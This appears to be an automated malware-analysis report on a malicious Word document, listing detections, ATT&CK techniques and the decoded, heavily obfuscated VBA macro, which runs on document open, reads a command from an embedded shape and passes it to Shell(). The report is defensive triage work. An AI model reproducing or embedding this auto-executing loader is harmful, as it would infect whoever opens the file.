MALICIOUS
272
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
The sample contains a Document_Open VBA macro that uses the Shell() function to invoke cmd.exe with obfuscated arguments. This indicates an attempt to download and execute a second-stage payload. The presence of PowerShell references and the ClamAV detection as a downloader further support this conclusion. The specific command executed is highly obfuscated, making it difficult to determine the exact payload, hence the 'unknown family' classification.
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-6773945-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6773945-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
End Select lMzVX = Array(bMjiiU, dOjutwL, tmRQGMYr, Interaction@.Shell(IslbJ, hwivkhmtIY), MumMhwRW) Select Case jSzXLUGKWHsnmlGnfw -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6424 bytes |
SHA-256: 8ccba8097a1ae50e78451f9d45097f2bc028a9d498ae3e8f8fb4604b07fc8b89 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
139 of 173 identifiers look randomly generated (e.g. 'ukPwbhAHbBCAhssHvrFWswws') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fqccqJYYpXCuhi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case IHLqsQXuiXFKJAfSwJF
Case 11923683
jVwBdQpPnqVIhWlYfmpz = 107668513
ZPfTNuijUDwvbmOpPzhiu = 216763862
CbittSXQDNzvhWJCukHWR = ChrB(78593326 / ChrB(249914798))
zJpWpQlmsicsjBkNwmsicqj = FzmunKTqpjujcAbncM
Case 24653730
tRStAtZiTDSIdW = 113400267
drzhLmCAGAlwLEGPmiaoitu = 303397485
oWmRmGGjjKkNWrGPSnzIc = ChrB(123884707 / ChrB(97660963))
CVwwdMjzFvXPQiUtiNcuVCQm = 129693693
End Select
Select Case HGUhvqSdZdmpItfnMQ
Case 73871388
hBVwlonSiXQPTIHjzuEPtziX = 281847765
LtWUPDspoGkXwGDA = 307477493
MXVAmwnSLwChWw = ChrB(36977067 / ChrB(160426740))
uwNINXdTBwbzzMsEcKTr = GZjwrwmGjmSYdIEj
Case 301014852
ArjlzMUOkKcunmjSnWhLWbrN = 118968193
JZTDoYiLTziVcUcc = 78955515
dowjrLVhzicZATTkCuu = ChrB(218407591 / ChrB(147191719))
LcThoStMjtPOjd = 96160963
End Select
Select Case BLkIKAsQYliSmBzjNbMVsVv
Case 204924334
tScoctnlrzXZcYpdJnBVzu = 58872329
pUBEjCfQFTRhQbwrrjuEcJl = 18575756
sjiuJszJizIsiFpRGU = ChrB(63325481 / ChrB(49172097))
MhqJiRzERfjwioS = WvaSYicowIbEmVpbvNfCskfb
Case 337312069
QTYuARWVkZipjdE = 12385565
WpvRwqHDUIQElQzT = 126865894
JPEHKhRkPsGiBzqZI = ChrB(246758747 / ChrB(25932683))
TdRrjIGQzIjVQLvmFPfNzM = 173276850
End Select
Select Case ARcoFzOaDwBFuiVKHisonKIU
Case 52290657
qEiBOpoqvBOtmTiazp = 338865078
DsnYikALJpJIjlHKsB = 227293789
QDiUvOwYFMNSVmQz = ChrB(109825708 / ChrB(65250289))
dochGsGMALXivHnEzK = cQnbGwbrmuVKtiiEXn
Case 147776069
cpBwNhiRLhhQnzhHpMW = 240374422
BTSiAiARCQRdhrnOqOYS = 69530781
FMFXwAXOKQlzbVjSMDiz = ChrB(57644217 / ChrB(110769514))
nFFuswwwSTVOFZdhz = 306196005
End Select
Select Case qKfcSRJGtsdcKz
Case 104973361
GSzNaHwfdvKNktiqjknW = 72806225
iRFjcuqNnTWdislRb = 227060562
AwXHvWzNmtaMtUrn = ChrB(214272748 / ChrB(49802717))
fEpQIqrGOmFRJEKLQHJKKcj = UNGcInEEKhDHKi
Case 99309868
DPkahbQIjJbfXziCX = 250575484
ukPwbhAHbBCAhssHvrFWswws = 334775248
ZhMzAjYmUjnRJsjT = ChrB(269085028 / ChrB(43637034))
JtniqnKSPCzlWzOITucB = 125295459
End Select
Select Case BTLBQCLmccAvmzIV
Case 151306045
zBMMiFhAFIzNzAuuMNmNC = 136177019
qcwdtHNBazjXQwplFUPwCnPi = 339217578
sluiJhfCWjkcnt = ChrB(291587964 / ChrB(44800953))
NRcivXcjtmYvDMTdsPc = rqwsNbFBcjWEwNC
Case 87767021
WwNRBPvHGTWQzudQzh = 149362639
kQTRbDMQUzpKGHWTO = 276220196
aDlHHikdmsowjfumFcvqzC = ChrB(204043726 / ChrB(256755992))
iMKsXKBJrvOwJLj = 281638815
End Select
Select Case zJiNQoMptPUvfhVZFAUvQr
Case 319545969
pcOIOCipLpnmizj = 231940789
SNoAlSqkudIicZIMZ = 155985340
ZDbrlfjptjrGRlfwiIHDJY = ChrB(160015397 / ChrB(129769927))
VKjQfaIbvJMrWDVBdwB = XrtwadESTiBfHS
Case 106020854
AZNIiiWcSGHEmCjbXQ = 11035420
RmpBVqHQHhkEmBBDisTs = 137820627
iTVzfRwaIqQlCOjMn = ChrB(294291446 / ChrB(150808599))
UlWDSkBcsiwJJAI = 143721182
End Select
Select Case PJrOIZsqbwTjwnzwF
Case 260636522
ccmQbEaDohjwhNmYtvmN = 221231197
XorYEjzBcNSiAoctQKhVEJr = 2220262
WMOECTawkFwZCzuDmEWdz = ChrB(89905991 / ChrB(329497994))
AfcfMoNwrmiTkwZusmPjiUNK = RREVWmIOTEXqukwrChPQaS
Case 278028665
blMzPQjRStuXIaUAaFRs = 12840025
zCTrcmztLwaZul = 171412970
zCYFYBpZibNPqUBz = ChrB(191215252 / ChrB(152000972))
KdXouUYhvwijiaPGPUwjwM = 308369880
End Select
Set KqShZtn = Shapes("zTnWboDjz").TextFrame
Select Case jYwhGpospcJhTCQICNLDYTiw
Case 283111683
TbSGqnPdjspjBjkcwRuhFL = 161747128
XinsbNpwqRWMail = 144916242
pSXSVLfSvUREJjIDL = ChrB(230210477 / ChrB(52206993))
XCWDrqkJYCQjYPPsBoCXIZfs = ujhNJOzdWunwTbibVut
Case 31742893
fuUQCXjkrzWifzKCwOnQD = 11963153
bvhNXwmimnnOmNzHqS = 294502752
zQSodUYZfFohdZsUUKJo = ChrB(31955564 / ChrB(126089235))
qsjXpwHzzKWXLdtjDYMwj = 336191429
End Select
IslbJ = KqShZtn.ContainingRange + fbvuwib + UcmjJE + qXHBh + KVVVQoFw + BzpHpla + aFQsUEr + idLnl + vlNFC + RLIBq + DoiJb + waHtfjE
Select Case zbVzcnDwwoiqjDnUHQkT
Case 233189304
JfzpRUinWqcaQzuwYQWpijNq = 239841154
KEqIFYuzRqAmWiSJSoOFmnaL = 289236232
wuPdSJFVKZwOkEjRhD = ChrB(313089259 / ChrB(249189544))
nWYOZbiJWiiQmbzkoYrhBYs = DDKYVGWQGZJXqOsh
Case 173753268
ovSwwchjsfEEsPiL = 74236973
RGnPIOKNSctafKHpjw = 305216977
FhrpNqMBjttiDXP = ChrB(132862406 / ChrB(162731637))
nEolKEnSAtzDfhRGQkO = 330270037
End Select
Select Case rzKnTXbpvNbwGbjEEJVBaBP
Case 218911476
pnnkPkQdAwTtpuolHLSdiP = 304270849
bAcAWUqkdzikoEjcLS = 37461052
QKOPhQTqwDLZtUJPHPGj = ChrB(49682531 / ChrB(231467132))
sPEzCipRLKQCQlMTG = AnZlFqUvQVwLZV
Case 217464738
WAcTQLHlAPcRsduvAfHvqHK = 92402398
HNUVzkvVWPMqnkojnlpO = 19242818
naALuOlDPpOpJz = ChrB(253377178 / ChrB(109676256))
ihvVNiFNuSPCWU = 23816
End Select
Select Case lJTSWACZprkOSHCNhVTB
Case 179078868
XfziNjSifVAVHKuziW = 271578057
XwQvkFIOhwHTEOmoVr = 258081281
GGMPOwArSkmzMEAaOB = ChrB(305735228 / ChrB(52703745))
EBhNjQsYGbrjTQQkBhn = QvzLKHzOLZTzfz
Case 14078204
fBhjHTLIvNtojqN = 133651546
DIIDVDZQiMhIuEW = 93667656
EzzHwwjoQwNLiVLz = ChrB(278371078 / ChrB(182879795))
tBJzIPdHiABIWZYlNVzGMY = 97283279
End Select
Const hwivkhmtIY = 0
Select Case TapSUSsHXiNHFzVpLu
Case 218959317
YwwRHCjrsnAiiFBMPXbrlI = 247756767
kYjFtAzjazzWdXLS = 252120396
PjdiZzwJanSpEP = ChrB(72678990 / ChrB(229020059))
jSawrnQIkFijrMJFktBkG = kHkaMQksjLuqbALCXwMWotTa
Case 225282936
JkUWJwbkhTORbzXrWTo = 10830777
IuhVFXjKqoKslHAYNCwOr = 123510855
oGUMwwXAljpBqmBDbrZrfEY = ChrB(277053112 / ChrB(292989798))
TIQrmtpCtOlKlNSnYL = 312485959
End Select
lMzVX = Array(bMjiiU, dOjutwL, tmRQGMYr, Interaction@.Shell(IslbJ, hwivkhmtIY), MumMhwRW)
Select Case jSzXLUGKWHsnmlGnfw
Case 157492416
SWdTciiAaorZIuiF = 216571392
kdcvoSEphBwHQsSiENoiudmF = 237637719
QSfsCAGiNujWhKPmAjESY = ChrB(333220436 / ChrB(52017137))
pVQCBHrXLGClKpwvBhfX = hfiPIdFARJRLBDhkDjGCJLbI
Case 194755816
KiJRrTjfHpmntdlWuzka = 54262363
RKzAYUoWEVlfSXrzSwbWvr = 330222026
mcRnQiYDUYQwTquPq = ChrB(241937393 / ChrB(242778835))
COLNiuilzlqZMiNwD = 9144250
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.